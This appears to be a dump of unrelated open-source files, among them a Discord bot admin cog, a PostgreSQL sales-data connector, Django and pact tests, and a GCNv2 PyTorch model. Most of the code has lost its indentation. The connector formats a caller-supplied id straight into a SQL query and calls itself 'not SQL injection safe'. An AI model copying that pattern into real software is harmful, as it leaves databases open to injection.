self.bot.reload_extension(f'cogs.{modules[0]}')
embed = discord.Embed(title='Reload Module', description=f'Module `{modules[0]}` has been reloaded.')
except discord.ext.commands.ExtensionNotLoaded:
try:
self.bot.load_extension(f'cogs.{modules[0]}')
except discord.ext.commands.ExtensionFailed:
embed = discord.Embed(title='Reload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` has an error, cannot load!')
except discord.ext.commands.ExtensionFailed:
embed = discord.Embed(title='Reload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` has an error, cannot load!')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
@module.command()
@commands.is_owner()
@commands.guild_only()
async def unload(self, ctx, *modules):
local_modules = self.get_modules()
modules = sorted([module.lower() for module in modules])
if len(modules) > 1 or modules[0] == 'all':
embed = discord.Embed(title='Unload Module')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
message = await ctx.send(embed=embed)
            successful_unloads = 0
            failed_unloads = 0
for module in (local_modules if modules[0] == 'all' else modules):
if not any(module == x for x in local_modules):
embed.add_field(name='Error', value=f'Module `{module}` does not exist!', inline=False)
await message.edit(embed=embed)
failed_unloads += 1
continue
if module == 'admin':
embed.add_field(name='Error', value=f'Module `{module}` cannot be unloaded!', inline=False)
await message.edit(embed=embed)
failed_unloads += 1
continue
try:
self.bot.unload_extension(f'cogs.{module}')
embed.add_field(name='Success', value=f'Module `{module}` successfully unloaded!', inline=False)
await message.edit(embed=embed)
successful_unloads += 1
except discord.ext.commands.ExtensionNotLoaded:
embed.add_field(name='Error', value=f'Module `{module}` is already unloaded!', inline=False)
await message.edit(embed=embed)
failed_unloads += 1
embed.add_field(name='Finished', value=f"**{successful_unloads}** module{'s' if successful_unloads != 1 else ''} successfully unloaded, **{failed_unloads}** module{'s' if failed_unloads != 1 else ''} failed to unload.")
await message.edit(embed=embed)
return
if not any(modules[0] == x for x in local_modules):
embed = discord.Embed(title='Unload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` does not exist!', inline=False)
embed.add_field(name='Available modules:', value=f"`{'`, `'.join(local_modules)}`", inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
return
try:
self.bot.unload_extension(f'cogs.{modules[0]}')
embed = discord.Embed(title='Unload Module', description=f'Module `{modules[0]}` has been unloaded.')
except discord.ext.commands.ExtensionNotLoaded:
embed = discord.Embed(title='Unload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` is already unloaded!')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(Admin(bot))
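# Hedged wiring sketch under the discord.py 1.x API this file already uses;
# the command prefix is an arbitrary placeholder and no token is run here.
if __name__ == '__main__':
    bot = commands.Bot(command_prefix='!')
    bot.load_extension('cogs.admin')  # invokes setup(bot) above and registers the Admin cog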
# ---- src/opf/__init__.py | krivopolianskii/opf @ 16cfe25194fd15c21702658cac302fe0dfce82d9 | MIT | 24 bytes ----
from .models import *
# ---- web_app/vis_comm/routes/python_scripts/server.py | RapidsAtHKUST/FYP16-CommunityDetectionVis @ 4b7c76f6f8f94d09ae4ab98262b894dfd6af3bc0 | MIT | 85 bytes ----
import os
os.system("cd ../community_detection_algos/docker;python run_docker.py;")
# ---- db/dbutil/db_queries_bloomberg.py | kaljuvee/openaltdata @ 9c5d140b56cfd5260fe3cf52b24bb7d467e87cf1 | MIT | 13,586 bytes ----
import db.db_access as access
import pandas as pd
import psycopg2
from sqlalchemy import create_engine
CONST_SQL_GET_COMP_NAME = 'SELECT * FROM maincompany;'
CONST_SQL_GET_REP_SALES = 'SELECT * FROM reported_sales;'
CONST_SQL_GET_DAILY_ESTIMATION = 'SELECT * FROM daily_sales_estimation;'
CONST_SQL_GET_DAILY_ESTIMATION_PER_MAIN_COMPANY_ID = 'SELECT * FROM daily_sales_estimation WHERE main_company_id = {MAIN_COMPANY_ID};'
CONST_SQL_GET_HIST_PRICES = 'SELECT * FROM historical_prices;'
INSERT_REPORTED_SALES = 'INSERT INTO reported_sales (main_company_id, quarter_group, end_quarter_date, start_quarter_date, filing_date, actual_sales, sales_reported, time_announcement) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)'
INSERT_DAILY_SALES_ESTIMATION = 'INSERT INTO daily_sales_estimation (main_company_id, quarter_group, year_estimation, quarter_estimation, datetime, estimation) VALUES (%s, %s, %s, %s, %s, %s)'
INSERT_HIST_PRICE = 'INSERT INTO historical_prices (main_company_id, date, close, high, low, open) VALUES (%s, %s, %s, %s, %s, %s)'
DELETE_DAILY_ESTIMATION_FUTURE = 'DELETE FROM daily_sales_estimation WHERE company_id = %s and quarter_group = %s;'
def first_column(array_2d):
return list(zip(*array_2d))[0]
def db_result_to_pandas(cursor_fetch_result):
return pd.DataFrame(cursor_fetch_result['result'], columns=cursor_fetch_result['header'])
class psql_bloomberg_pipeline_connector_db(object):
"""
Class for getting data from the database.
Currently not SQL injection safe.
"""
def __init__(self):
self.host, self.port, self.database, self.user, self.password = access.postgre_access_google_cloud()
        self.message = f'postgres://{self.user}:{self.password}@{self.host}:{self.port}/{self.database}'
def get_psql_context(self):
cnx = psycopg2.connect(host=self.host, port=self.port, database=self.database, user=self.user, password=self.password)
return cnx
def get_create_engine(self):
engine = create_engine(self.message)
return engine
def get_companies_names(self):
cnx = self.get_psql_context()
cur = cnx.cursor()
try:
cur.execute(CONST_SQL_GET_COMP_NAME)
result = cur.fetchall()
df = pd.DataFrame.from_records(result, columns=[x[0] for x in cur.description])
return df
finally:
cur.close()
def get_reported_sales(self):
"""
Returns reported sales for all companies.
Among the column names the column "group" actually means quarter
:param company_id:
:return: {"result": <query result>, "header": <names of the columns>
"""
cnx = self.get_psql_context()
cur = cnx.cursor()
try:
cur.execute(CONST_SQL_GET_REP_SALES)
result = cur.fetchall()
df = pd.DataFrame.from_records(result, columns=[x[0] for x in cur.description])
return df
finally:
cur.close()
def get_daily_sales_estimation(self):
"""
Returns reported sales for all companies.
Among the column names the column "group" actually means quarter
:param company_id:
:return: {"result": <query result>, "header": <names of the columns>
"""
cnx = self.get_psql_context()
cur = cnx.cursor()
try:
cur.execute(CONST_SQL_GET_DAILY_ESTIMATION)
result = cur.fetchall()
df = pd.DataFrame.from_records(result, columns=[x[0] for x in cur.description])
return df
finally:
cur.close()
def get_daily_sales_estimation_per_main_company_id(self, main_company_id):
"""
Returns reported sales for all companies.
Among the column names the column "group" actually means quarter
:param main_company_id:
:return: {"result": <query result>, "header": <names of the columns>
"""
cnx = self.get_psql_context()
cur = cnx.cursor()
try:
query = CONST_SQL_GET_DAILY_ESTIMATION_PER_MAIN_COMPANY_ID.format(MAIN_COMPANY_ID=str(main_company_id))
cur.execute(query)
result = cur.fetchall()
df = pd.DataFrame.from_records(result, columns=[x[0] for x in cur.description])
return df
finally:
cur.close()
def get_historical_prices(self):
cnx = self.get_psql_context()
cur = cnx.cursor()
try:
cur.execute(CONST_SQL_GET_HIST_PRICES)
result = cur.fetchall()
df = pd.DataFrame.from_records(result, columns=[x[0] for x in cur.description])
return df
finally:
cur.close()
def insert_reported_sales(self, df):
cnx = self.get_psql_context()
cursor = cnx.cursor()
try:
df = df[['main_company_id', 'group', 'end_quarter_date', 'start_quarter_date', 'filing_date', 'actual_sales', 'sales_reported', 'time']]
# change format for date and time to insert it in db
df['end_quarter_date'] = df['end_quarter_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['end_quarter_date']))
df['start_quarter_date'] = df['start_quarter_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['start_quarter_date']))
df['filing_date'] = df['filing_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['filing_date']))
cursor.executemany(INSERT_REPORTED_SALES, df.values.tolist())
cnx.commit()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
cursor.close()
cnx.close()
def insert_daily_estimation(self, df):
engine = self.get_create_engine()
try:
table_name = 'daily_sales_estimation'
df.to_sql(table_name, con=engine.connect(), if_exists='append', index=False, method='multi')
except (Exception, psycopg2.DatabaseError) as error:
print(error)
def insert_historical_price(self, df):
cnx = self.get_psql_context()
cursor = cnx.cursor()
try:
df = df[['main_company_id', 'date', 'close', 'high', 'low', 'open']]
cursor.executemany(INSERT_HIST_PRICE, df.values.tolist())
cnx.commit()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
cursor.close()
cnx.close()
def delete_daily_estimation_quarter(self, df):
cnx = self.get_psql_context()
cursor = cnx.cursor()
try:
df = df[['main_company_id', 'quarter_group']]
cursor.executemany(DELETE_DAILY_ESTIMATION_FUTURE, df.values.tolist())
cnx.commit()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
cursor.close()
cnx.close()
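# Hedged usage sketch for the connector above; it assumes
# db.db_access.postgre_access_google_cloud() resolves working credentials,
# which this module does not define.
if __name__ == '__main__':
    db = psql_bloomberg_pipeline_connector_db()
    companies = db.get_companies_names()  # DataFrame of the maincompany table
    estimates = db.get_daily_sales_estimation_per_main_company_id(1)
    print(companies.head(), estimates.head())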
'''
class TrafficDatabaseConnector(object):
"""
Class for getting data from the database.
Currently not SQL injection safe.
"""
def __init__(self):
server, database, username, password, driver = access.parameter()
self.cnx = mysql.connector.connect(user=username, password=password,
host=server,
database=database)
def get_mysql_context(self):
server, database, username, password, driver = access.parameter()
cnx = mysql.connector.connect(user=username, password=password,
host=server,
database=database)
return cnx
def get_companies_names(self):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
cursor.execute(CONST_SQL_GET_COMP_NAME)
result = {"result": cursor.fetchall(), "header": first_column(cursor.description)}
cursor.close()
cnx.close()
return result
def get_companies_names_pandas(self):
return db_result_to_pandas(self.get_companies_names())
def get_reported_sales(self):
"""
Returns reported sales for all companies.
Among the column names the column "group" actually means quarter
:param company_id:
:return: {"result": <query result>, "header": <names of the columns>
"""
sql_request = CONST_SQL_GET_REP_SALES
cnx = self.get_mysql_context()
cursor = cnx.cursor()
cursor.execute(sql_request)
result = {"result": cursor.fetchall(), "header": first_column(cursor.description)}
cursor.close()
cnx.close()
return result
def get_reported_sales_pandas(self):
return db_result_to_pandas(self.get_reported_sales())
def get_daily_sales_estimation(self):
"""
Returns reported sales for all companies.
Among the column names the column "group" actually means quarter
:param company_id:
:return: {"result": <query result>, "header": <names of the columns>
"""
sql_request = CONST_SQL_GET_DAILY_ESTIMATION
cnx = self.get_mysql_context()
cursor = cnx.cursor()
cursor.execute(sql_request)
result = {"result": cursor.fetchall(), "header": first_column(cursor.description)}
cursor.close()
cnx.close()
return result
def get_daily_sales_estimation_pandas(self):
return db_result_to_pandas(self.get_daily_sales_estimation())
def get_historical_prices(self):
sql_request = CONST_SQL_GET_HIST_PRICES
cnx = self.get_mysql_context()
cursor = cnx.cursor()
cursor.execute(sql_request)
result = {"result": cursor.fetchall(), "header": first_column(cursor.description)}
cursor.close()
cnx.close()
return result
def get_historical_prices_pandas(self):
return db_result_to_pandas(self.get_historical_prices())
def insert_reported_sales(self, df):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
try:
df = df[['company_id', 'group', 'end_quarter_date', 'start_quarter_date', 'filing_date', 'actual_sales', 'sales_reported', 'time']]
# change format for date and time to insert it in db
df['end_quarter_date'] = df['end_quarter_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['end_quarter_date']))
df['start_quarter_date'] = df['start_quarter_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['start_quarter_date']))
df['filing_date'] = df['filing_date'].map(lambda x: x.strftime('%Y-%m-%d'), list(df['filing_date']))
cursor.executemany(INSERT_REPORTED_SALES, df.values.tolist())
cnx.commit()
except mysql.connector.Error as error:
print("Failed to insert record into Laptop table {}".format(error))
finally:
cursor.close()
cnx.close()
def insert_daily_estimation(self, df):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
try:
df = df[['company_id', 'quarter_group', 'year_estimation', 'quarter_estimation', 'datetime', 'estimation']]
cursor.executemany(INSERT_DAILY_SALES_ESTIMATION, df.values.tolist())
cnx.commit()
except mysql.connector.Error as error:
print("Failed to insert record into Laptop table {}".format(error))
finally:
cursor.close()
cnx.close()
def insert_historical_price(self, df):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
try:
df = df[['company_id', 'date', 'close', 'high', 'low', 'open']]
cursor.executemany(INSERT_HIST_PRICE, df.values.tolist())
cnx.commit()
except mysql.connector.Error as error:
print("Failed to insert record into Laptop table {}".format(error))
finally:
cursor.close()
cnx.close()
def delete_daily_estimation_quarter(self, df):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
try:
df = df[['company_id', 'quarter_group']]
cursor.executemany(DELETE_DAILY_ESTIMATION_FUTURE, df.values.tolist())
cnx.commit()
except mysql.connector.Error as error:
print("Failed to insert record into Laptop table {}".format(error))
finally:
cursor.close()
cnx.close()
def _run_sql_query(self, sql_request):
cnx = self.get_mysql_context()
cursor = cnx.cursor()
cursor.execute(sql_request)
result = {"result": cursor.fetchall(), "header": first_column(cursor.description)}
cursor.close()
cnx.close()
return result
def run_sql_query(self, sql_request):
return db_result_to_pandas(self._run_sql_query(sql_request))
def cache_db_request_pandas(db_request, pandas_filename):
try:
return pd.read_pickle(pandas_filename)
except Exception as e:
pandas_obj = db_request()
pandas_obj.to_pickle(pandas_filename)
return pandas_obj
'''
# ---- mexmi/models/imagenet/__init__.py | mexmi2021/mexmi-project @ ef735cb290d33b326f592a70fa9b7f7dc6b6281b | MIT | 2,110 bytes ----
"""Fallback to Cadene imagenet models (superset of torchvision models)
Source: https://github.com/Cadene/pretrained-models.pytorch
"""
# from pretrainedmodels import fbresnet152
# from pretrainedmodels import cafferesnet101
# from pretrainedmodels import bninception
# from pretrainedmodels import resnext101_32x4d
# from pretrainedmodels import resnext101_64x4d
# from pretrainedmodels import inceptionv4
# from pretrainedmodels import inceptionresnetv2
# from pretrainedmodels import nasnetalarge
# from pretrainedmodels import nasnetamobile
# from pretrainedmodels import alexnet
# from pretrainedmodels import densenet121
# from pretrainedmodels import densenet169
# from pretrainedmodels import densenet201
# from pretrainedmodels import densenet161
# from pretrainedmodels import resnet18
# from pretrainedmodels import resnet34
# from pretrainedmodels import resnet50
# from pretrainedmodels import resnet101
# from pretrainedmodels import resnet152
# from pretrainedmodels import inceptionv3
# from pretrainedmodels import squeezenet1_0
# from pretrainedmodels import squeezenet1_1
# from pretrainedmodels import vgg11
# from pretrainedmodels import vgg11_bn
# from pretrainedmodels import vgg13
# from pretrainedmodels import vgg13_bn
# from pretrainedmodels import vgg16
# from pretrainedmodels import vgg16_bn
# from pretrainedmodels import vgg19_bn
# from pretrainedmodels import vgg19
# from pretrainedmodels import dpn68
# from pretrainedmodels import dpn68b
# from pretrainedmodels import dpn92
# from pretrainedmodels import dpn98
# from pretrainedmodels import dpn131
# from pretrainedmodels import dpn107
# from pretrainedmodels import xception
# from pretrainedmodels import senet154
# from pretrainedmodels import se_resnet50
# from pretrainedmodels import se_resnet101
# from pretrainedmodels import se_resnet152
# from pretrainedmodels import se_resnext50_32x4d
# from pretrainedmodels import se_resnext101_32x4d
# from pretrainedmodels import pnasnet5large
# from pretrainedmodels import polynet
from .bagnets import bagnet9
from .bagnets import bagnet17
from .bagnets import bagnet33
# ---- pyfacebook/__init__.py | nedsons/python-facebook @ bf2b4a70ef0e0a67a142f5856586ea318f9807ea | Apache-2.0 | 165 bytes ----
# coding=utf-8
from __future__ import absolute_import
from .api import * # noqa
from .error import * # noqa
from .models import * # noqa
__version__ = "0.8.1"
# ---- Validation/MtdValidation/python/MtdPostProcessor_cff.py | SWuchterl/cmssw @ 769b4a7ef81796579af7d626da6039dfa0347b8e | Apache-2.0 | 323 bytes ----
import FWCore.ParameterSet.Config as cms
from Validation.MtdValidation.btlSimHitsPostProcessor_cfi import btlSimHitsPostProcessor
from Validation.MtdValidation.MtdGlobalRecoPostProcessor_cfi import MtdGlobalRecoPostProcessor
mtdValidationPostProcessor = cms.Sequence(btlSimHitsPostProcessor + MtdGlobalRecoPostProcessor)
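# Hedged fragment showing how such a sequence is typically scheduled; a _cff file
# is normally imported into a top-level config, so the process name and path label
# below are placeholders, not taken from CMSSW configs.
# process = cms.Process('MtdValidation')
# process.postProcessorPath = cms.Path(mtdValidationPostProcessor)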
# ---- 01_Hello/hello01_print.py | davidlg2005/tiny_python_projects @ 3f86615f32c10cb2e689ef4abc56c2c194063bfe | MIT | 26 bytes ----
print('01_Hello, World!')
# ---- pactman/test/pact_serialisation/test_request_query.py | AustralianSynchrotron/pactman @ 9e149e0b1da2dea2c58cfc7cab76f407ac03060e | MIT | 5,635 bytes ----
import pytest
from pactman import Consumer, Like, Provider, Term
from pactman.mock.request import Request
def test_v2():
pact = Consumer('consumer').has_pact_with(Provider('provider'), version='2.0.0')
pact.given("the condition exists").upon_receiving("a request") \
.with_request("GET", "/path", query="fields=first,second").will_respond_with(200, body='ok')
result = pact.construct_pact(pact._interactions[0])
assert result == {
'consumer': {'name': 'consumer'},
'provider': {'name': 'provider'},
'interactions': [
{
'description': 'a request',
'providerState': 'the condition exists',
'request': dict(method='GET', path='/path', query='fields=first,second'),
'response': dict(status=200, body='ok'),
}
],
'metadata': dict(pactSpecification=dict(version='2.0.0'))
}
@pytest.mark.parametrize('query_field', [
'first,second',
['first,second']
])
def test_v3(query_field):
pact = Consumer('consumer').has_pact_with(Provider('provider'), version='3.0.0')
pact.given([{'name': "the condition exists", 'params': {}}]).upon_receiving("a request") \
.with_request("GET", "/path", query=dict(fields=query_field)).will_respond_with(200, body='ok')
result = pact.construct_pact(pact._interactions[0])
assert result == {
'consumer': {'name': 'consumer'},
'provider': {'name': 'provider'},
'interactions': [
{
'description': 'a request',
'providerStates': [{'name': 'the condition exists', 'params': {}}],
'request': dict(method='GET', path='/path', query=dict(fields=['first,second'])),
'response': dict(status=200, body='ok'),
}
],
'metadata': dict(pactSpecification=dict(version='3.0.0'))
}
def test_like_v2():
pact = Consumer('consumer').has_pact_with(Provider('provider'), version='2.0.0')
pact.given("the condition exists").upon_receiving("a request") \
.with_request("GET", "/path", query=Like("fields=first,second")).will_respond_with(200, body='ok')
result = pact.construct_pact(pact._interactions[0])
assert result == {
'consumer': {'name': 'consumer'},
'provider': {'name': 'provider'},
'interactions': [
{
'description': 'a request',
'providerState': 'the condition exists',
'request': dict(method='GET', path='/path', query='fields=first,second',
matchingRules={'$.query': {'match': 'type'}}),
'response': dict(status=200, body='ok'),
}
],
'metadata': dict(pactSpecification=dict(version='2.0.0'))
}
def test_like_v3():
pact = (
Consumer('consumer').has_pact_with(Provider('provider'), version='3.0.0')
.given("the condition exists")
.upon_receiving("a request")
.with_request("GET", "/path", query=dict(fields=Like(['first,second'])))
.will_respond_with(200, body='ok')
)
result = pact.construct_pact(pact._interactions[0])
assert result == {
'consumer': {'name': 'consumer'},
'provider': {'name': 'provider'},
'interactions': [
{
'description': 'a request',
'providerStates': [{'name': 'the condition exists', 'params': {}}],
'request': dict(method='GET', path='/path', query=dict(fields=['first,second']),
matchingRules={'query': {'fields': {'matchers': [{'match': 'type'}]}}}),
'response': dict(status=200, body='ok'),
}
],
'metadata': dict(pactSpecification=dict(version='3.0.0'))
}
def test_broader_like_v3():
pact = (
Consumer('consumer').has_pact_with(Provider('provider'), version='3.0.0')
.given("the condition exists")
.upon_receiving("a request")
.with_request("GET", "/path", query=Like(dict(fields=['first,second'])))
.will_respond_with(200, body='ok')
)
result = pact.construct_pact(pact._interactions[0])
assert result == {
'consumer': {'name': 'consumer'},
'provider': {'name': 'provider'},
'interactions': [
{
'description': 'a request',
'providerStates': [{'name': 'the condition exists', 'params': {}}],
'request': dict(method='GET', path='/path', query=dict(fields=['first,second']),
matchingRules={'query': {'*': {'matchers': [{'match': 'type'}]}}}),
'response': dict(status=200, body='ok'),
}
],
'metadata': dict(pactSpecification=dict(version='3.0.0'))
}
def test_matcher_in_query():
target = Request('GET', '/test-path', query={'q': [Like('spam')], 'l': [Term(r'\d+', '10')]})
assert target.json('3.0.0') == {
'method': 'GET',
'path': '/test-path',
'query': {'q': ['spam'], 'l': ['10']},
'matchingRules': {
'query': {
'q': {
'matchers': [
{
'match': 'type'
},
]
},
'l': {
'matchers': [
{
'match': 'regex',
'regex': r'\d+',
}
]
},
}
}
}
# ---- tests/known_related_objects/tests.py | webjunkie/django @ 5dbca13f3baa2e1bafd77e84a80ad6d8a074712e | BSD-3-Clause | 5,773 bytes ----
from __future__ import absolute_import
from django.test import TestCase
from .models import Tournament, Organiser, Pool, PoolStyle
class ExistingRelatedInstancesTests(TestCase):
fixtures = ['tournament.json']
def test_foreign_key(self):
with self.assertNumQueries(2):
tournament = Tournament.objects.get(pk=1)
pool = tournament.pool_set.all()[0]
self.assertIs(tournament, pool.tournament)
def test_foreign_key_prefetch_related(self):
with self.assertNumQueries(2):
tournament = (Tournament.objects.prefetch_related('pool_set').get(pk=1))
pool = tournament.pool_set.all()[0]
self.assertIs(tournament, pool.tournament)
def test_foreign_key_multiple_prefetch(self):
with self.assertNumQueries(2):
tournaments = list(Tournament.objects.prefetch_related('pool_set').order_by('pk'))
pool1 = tournaments[0].pool_set.all()[0]
self.assertIs(tournaments[0], pool1.tournament)
pool2 = tournaments[1].pool_set.all()[0]
self.assertIs(tournaments[1], pool2.tournament)
def test_queryset_or(self):
tournament_1 = Tournament.objects.get(pk=1)
tournament_2 = Tournament.objects.get(pk=2)
with self.assertNumQueries(1):
pools = tournament_1.pool_set.all() | tournament_2.pool_set.all()
related_objects = set(pool.tournament for pool in pools)
self.assertEqual(related_objects, set((tournament_1, tournament_2)))
def test_queryset_or_different_cached_items(self):
tournament = Tournament.objects.get(pk=1)
organiser = Organiser.objects.get(pk=1)
with self.assertNumQueries(1):
pools = tournament.pool_set.all() | organiser.pool_set.all()
first = pools.filter(pk=1)[0]
self.assertIs(first.tournament, tournament)
self.assertIs(first.organiser, organiser)
def test_queryset_or_only_one_with_precache(self):
tournament_1 = Tournament.objects.get(pk=1)
tournament_2 = Tournament.objects.get(pk=2)
# 2 queries here as pool id 3 has tournament 2, which is not cached
with self.assertNumQueries(2):
pools = tournament_1.pool_set.all() | Pool.objects.filter(pk=3)
related_objects = set(pool.tournament for pool in pools)
self.assertEqual(related_objects, set((tournament_1, tournament_2)))
# and the other direction
with self.assertNumQueries(2):
pools = Pool.objects.filter(pk=3) | tournament_1.pool_set.all()
related_objects = set(pool.tournament for pool in pools)
self.assertEqual(related_objects, set((tournament_1, tournament_2)))
def test_queryset_and(self):
tournament = Tournament.objects.get(pk=1)
organiser = Organiser.objects.get(pk=1)
with self.assertNumQueries(1):
pools = tournament.pool_set.all() & organiser.pool_set.all()
first = pools.filter(pk=1)[0]
self.assertIs(first.tournament, tournament)
self.assertIs(first.organiser, organiser)
def test_one_to_one(self):
with self.assertNumQueries(2):
style = PoolStyle.objects.get(pk=1)
pool = style.pool
self.assertIs(style, pool.poolstyle)
def test_one_to_one_select_related(self):
with self.assertNumQueries(1):
style = PoolStyle.objects.select_related('pool').get(pk=1)
pool = style.pool
self.assertIs(style, pool.poolstyle)
def test_one_to_one_multi_select_related(self):
with self.assertNumQueries(1):
poolstyles = list(PoolStyle.objects.select_related('pool').order_by('pk'))
self.assertIs(poolstyles[0], poolstyles[0].pool.poolstyle)
self.assertIs(poolstyles[1], poolstyles[1].pool.poolstyle)
def test_one_to_one_prefetch_related(self):
with self.assertNumQueries(2):
style = PoolStyle.objects.prefetch_related('pool').get(pk=1)
pool = style.pool
self.assertIs(style, pool.poolstyle)
def test_one_to_one_multi_prefetch_related(self):
with self.assertNumQueries(2):
poolstyles = list(PoolStyle.objects.prefetch_related('pool').order_by('pk'))
self.assertIs(poolstyles[0], poolstyles[0].pool.poolstyle)
self.assertIs(poolstyles[1], poolstyles[1].pool.poolstyle)
def test_reverse_one_to_one(self):
with self.assertNumQueries(2):
pool = Pool.objects.get(pk=2)
style = pool.poolstyle
self.assertIs(pool, style.pool)
def test_reverse_one_to_one_select_related(self):
with self.assertNumQueries(1):
pool = Pool.objects.select_related('poolstyle').get(pk=2)
style = pool.poolstyle
self.assertIs(pool, style.pool)
def test_reverse_one_to_one_prefetch_related(self):
with self.assertNumQueries(2):
pool = Pool.objects.prefetch_related('poolstyle').get(pk=2)
style = pool.poolstyle
self.assertIs(pool, style.pool)
def test_reverse_one_to_one_multi_select_related(self):
with self.assertNumQueries(1):
pools = list(Pool.objects.select_related('poolstyle').order_by('pk'))
self.assertIs(pools[1], pools[1].poolstyle.pool)
self.assertIs(pools[2], pools[2].poolstyle.pool)
def test_reverse_one_to_one_multi_prefetch_related(self):
with self.assertNumQueries(2):
pools = list(Pool.objects.prefetch_related('poolstyle').order_by('pk'))
self.assertIs(pools[1], pools[1].poolstyle.pool)
self.assertIs(pools[2], pools[2].poolstyle.pool)
# ---- models/arch.py | XiaoSong9905/GCNv2 @ 1fc370fbc4cebafa7aed141e68b063092e88d6d2 | Apache-2.0 | 3,474 bytes ----
import torch


class GCNv2(torch.nn.Module):
    def __init__(self):
        super(GCNv2, self).__init__()
        self.elu = torch.nn.ELU(inplace=True)

        self.conv1 = torch.nn.Conv2d(1, 32, kernel_size=4, stride=2, padding=1)
        self.conv2 = torch.nn.Conv2d(32, 64, kernel_size=4, stride=2, padding=1)
        self.conv3_1 = torch.nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1)
        self.conv3_2 = torch.nn.Conv2d(128, 128, kernel_size=4, stride=2, padding=1)
        self.conv4_1 = torch.nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1)
        self.conv4_2 = torch.nn.Conv2d(256, 256, kernel_size=4, stride=2, padding=1)

        # Descriptor
        self.convF_1 = torch.nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
        self.convF_2 = torch.nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)

        # Detector
        self.convD_1 = torch.nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
        self.convD_2 = torch.nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
        self.pixel_shuffle = torch.nn.PixelShuffle(16)

    def forward(self, x):
        x = self.elu(self.conv1(x))
        x = self.elu(self.conv2(x))
        x = self.elu(self.conv3_1(x))
        x = self.elu(self.conv3_2(x))
        x = self.elu(self.conv4_1(x))
        x = self.elu(self.conv4_2(x))

        # Descriptor xF
        xF = self.elu(self.convF_1(x))
        desc = self.convF_2(xF)
        dn = torch.norm(desc, p=2, dim=1)  # Compute the norm.
        desc = desc.div(torch.unsqueeze(dn, 1))  # Divide by norm to normalize.

        # Detector xD
        xD = self.elu(self.convD_1(x))
        det = self.convD_2(xD).sigmoid()
        det = self.pixel_shuffle(det)
        return desc, det


class GCNv2_tiny(torch.nn.Module):
    def __init__(self):
        super(GCNv2_tiny, self).__init__()
        self.elu = torch.nn.ELU(inplace=True)

        self.conv1 = torch.nn.Conv2d(1, 32, kernel_size=4, stride=2, padding=1)
        self.conv2 = torch.nn.Conv2d(32, 32, kernel_size=4, stride=2, padding=1)
        self.conv3_1 = torch.nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1)
        self.conv3_2 = torch.nn.Conv2d(64, 64, kernel_size=4, stride=2, padding=1)
        self.conv4_1 = torch.nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1)
        self.conv4_2 = torch.nn.Conv2d(128, 128, kernel_size=4, stride=2, padding=1)

        # Descriptor
        self.convF_1 = torch.nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1)
        self.convF_2 = torch.nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
        self.convD_1 = torch.nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1)
        self.convD_2 = torch.nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
        self.pixel_shuffle = torch.nn.PixelShuffle(16)

    def forward(self, x):
        x = self.elu(self.conv1(x))
        x = self.elu(self.conv2(x))
        x = self.elu(self.conv3_1(x))
        x = self.elu(self.conv3_2(x))
        x = self.elu(self.conv4_1(x))
        x = self.elu(self.conv4_2(x))

        # Descriptor xF
        xF = self.elu(self.convF_1(x))
        desc = self.convF_2(xF)
        dn = torch.norm(desc, p=2, dim=1)  # Compute the norm.
        desc = desc.div(torch.unsqueeze(dn, 1))  # Divide by norm to normalize.

        # Detector xD
        xD = self.elu(self.convD_1(x))
        det = self.convD_2(xD).sigmoid()
        det = self.pixel_shuffle(det)
        return desc, det
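# Quick shape check (added sketch, not part of the original file): the four
# stride-2 convolutions downsample by 16x, and PixelShuffle(16) folds the
# detector's 256 channels back into one full-resolution channel, so H and W
# must be multiples of 16:
#
#     net = GCNv2()
#     desc, det = net(torch.randn(1, 1, 480, 640))  # grayscale input
#     desc.shape  ->  torch.Size([1, 256, 30, 40])  # L2-normalized descriptors at 1/16 res
#     det.shape   ->  torch.Size([1, 1, 480, 640])  # per-pixel detection confidence map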
| 36.568421
| 84
| 0.613414
| 563
| 3,474
| 3.653641
| 0.106572
| 0.088478
| 0.126398
| 0.052504
| 0.976179
| 0.976179
| 0.969373
| 0.967428
| 0.931454
| 0.928537
| 0
| 0.096067
| 0.238918
| 3,474
| 95
| 85
| 36.568421
| 0.681921
| 0.050662
| 0
| 0.688525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065574
| false
| 0
| 0.016393
| 0
| 0.147541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
